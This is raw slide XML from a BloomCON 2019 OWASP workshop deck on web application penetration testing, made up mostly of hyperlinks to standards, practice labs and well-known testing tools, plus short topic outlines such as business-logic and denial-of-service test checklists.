Target="https://www.openbugbounty.org/"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46.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide152.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/owaspbwa/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project/Pages/Online"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github.com/webpwnized/mutillidae" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dvwa.co.uk/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vulnerablewebapps.org/"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www.sans.org/course/web-app-penetration-testing-ethical-hacking" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pentesteracademy.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lanmaster53.com/training/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elearnsecurity.com/certification/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/"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www.infosecurity-magazine.com/news/hackedu-hackerone-partner-to-offer/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackerone.com/hacker101" TargetMode="Externa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www.owasp.org/images/1/19/OTGv4.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/download-kali-linux-revealed-book/" TargetMode="Externa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hyperlink" Target="https://github.com/outofcontrolnate/Central-Pennsylvania--OWASP" TargetMode="Externa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hyperlink" Target="https://www.linkedin.com/in/nathan-cooper-35b0782b/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Nathan.cooper@owasp.org" TargetMode="Externa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hackerone.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bugcrowd.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hyperlink" Target="https://www.hackerone.com/sites/default/files/2018-07/The%20Hacker-Powered%20Security%20Report%202018.pdf"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cwe.mitre.org/top25/"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onehostcloud.hosting/kali-linux-vps-hosting/"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oVdYhiYSl54&amp;feature=youtu.be" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/drive/folders/0ByiDshWJ_PnZdnJZQ0h3MWZyRUk" TargetMode="Externa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hyperlink" Target="https://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis" TargetMode="Externa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www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"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hyperlink" Target="http://www.isecom.org/research/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oissg.org/issaf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/1/19/OTGv4.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-115/final" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crest-approved.org/wp-content/uploads/Penetration-Testing-MMAT-Guide-2017.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fedramp.gov/assets/resources/documents/CSP_Penetration_Test_Guidance.pd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whois.domaintools.com/" TargetMode="External"/><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https://www.robtex.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toolbar.netcraf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hyperlink" Target="https://tools.kali.org/information-gathering/recon-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darkoperator/dnsrecon"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hyperlink" Target="https://tools.kali.org/information-gathering/dnsrecon"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leebaird/discover"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laramies/theHarvester"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hyperlink" Target="https://tools.kali.org/information-gathering/theharvest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archive.org/web/"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exiftool/exiftool" TargetMode="External"/><Relationship Id="rId7"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github.com/laramies/metagoofil"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ww.offensive-security.com/community-projects/google-hacking-databas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shodan.io/"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censys.io/"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builtwith.com/"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hyperlink" Target="https://www.paterva.com/web7/community/community.php" TargetMode="External"/><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nmap.org/download.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="Externa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hyperlink" Target="https://nmap.org/book/man.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nmap"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nmap.org/nsedoc/"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hyperlink" Target="https://github.com/nmap/nmap/tree/master/script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vulnersCom/nmap-vulner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hyperlink" Target="https://www.wappalyzer.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.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cirt.net/nikto2-docs/installation.html#id2780292" TargetMode="Externa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nabla-c0d3/sslyze" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/nsedoc/scripts/ssl-enum-ciphers.html" TargetMode="Externa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hyperlink" Target="https://www.ssllabs.com/"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www.blackhillsinfosec.com/towards-quieter-firefox/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/#gref"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s://www.phillips321.co.uk/2012/03/01/xss-browser-filters-disabling-it-for-app-testing/"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portswigger.net/burp/communitydownload" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="Externa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www.owasp.org/index.php/Category:OWASP_DirBuster_Project" TargetMode="Externa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portswigger.net/burp/documentation/scanner/crawling" TargetMode="Externa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C0641D-CBFA-4E8F-8746-433F6B6370FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BloomCON 2019</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type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP WORKSHOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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93329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OWASP Top 10 Risk Rating Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="166935" y="1597922"/>
            <a:ext cx="11821865" cy="2716270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10"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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9100DD5-371B-4D21-91BB-C48628B0BF22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="166934" y="4325687"/>
            <a:ext cx="11821865" cy="2456113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92078065"/>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1B4B-57E2-447F-9FE3-FB810D354E12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery – Business Logic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647E78FF-E01B-4AA6-868F-BF7167D97375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for feature misuse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for lack of non-repudiation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for trust relationships </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for integrity of data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test segregation of duties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19433656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4793-0F00-47F2-B276-189D5445A17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery – Denial of Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C0396BF-7B14-4548-B42E-748E8CCD4927}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for anti-automation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for account lockout </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for HTTP protocol DoS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31320733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4187F-9024-4828-849D-6273B40ECA57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP testing Guide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EEEF6F-488E-4D87-B3D0-A1064E4EF08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OWASP Testing Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP testing checklist spreadsheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE067CF-18CE-49F3-8633-3845A22360CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815440" y="3590924"/>
            <a:ext cx="6347360" cy="3215439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7268167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ABDB-5674-484B-A930-72B07A974679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cewl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88BDB803-2951-4040-8235-6588576087A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Installation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61C81160-A762-4B14-BC88-7FBF6E30EDAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609209" y="2277467"/>
            <a:ext cx="9151718" cy="4391243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22998153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1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FuzzDB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecList</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18448031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744C0-F335-4DB3-921E-2CBDE90163BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9F2A3A-C2CB-402D-BD89-FE9DAF326A69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100361" y="1572323"/>
            <a:ext cx="11482039" cy="4553842"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FuzzDB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SecList</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AC75007-457B-47BB-8B65-95BE0EBF6097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="245327" y="2321020"/>
            <a:ext cx="11701346" cy="1107980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ACF175C-815C-428A-813B-3CBF3CDA2353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="245327" y="4171114"/>
            <a:ext cx="11701346" cy="1904870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38661560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7AFF2-EAEB-4FBA-8A6F-3378279F3F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476CEC22-48C6-4258-818C-359D1D30387F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Installation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>User guide </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
